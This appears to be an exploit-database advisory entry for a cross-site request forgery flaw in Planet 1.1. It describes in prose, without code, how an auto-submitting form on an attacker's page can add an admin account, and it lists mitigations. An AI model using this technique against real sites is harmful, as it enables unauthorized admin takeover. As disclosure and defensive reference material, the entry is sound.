Vendor: Planet
By: G0D-F4Th3r
CVSS: 8.8 (HIGH)
CWE: 352 (Cross-Site Request Forgery (CSRF))
Product Name: Planet
Affected Version From: 1.1
Affected Version To: 1.1
Patch Exists: NO
Related CWE: N/A
CPE: a:femtolayer:planet:1.1
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
2010
Planet 1.1 – [CSRF] Add Admin Account
This exploit allows an attacker to add an admin account to Planet 1.1. The attacker crafts a malicious HTML page containing a form whose fields carry the username, password, email, mobile, site, location, and access values. When the victim visits the malicious page, the form is submitted automatically from the victim's browser and the attacker's account is created.
Mitigation:
CSRF attacks of this kind can be mitigated by requiring anti-CSRF tokens on state-changing requests, setting the SameSite attribute on session cookies, and deploying a Content Security Policy (CSP).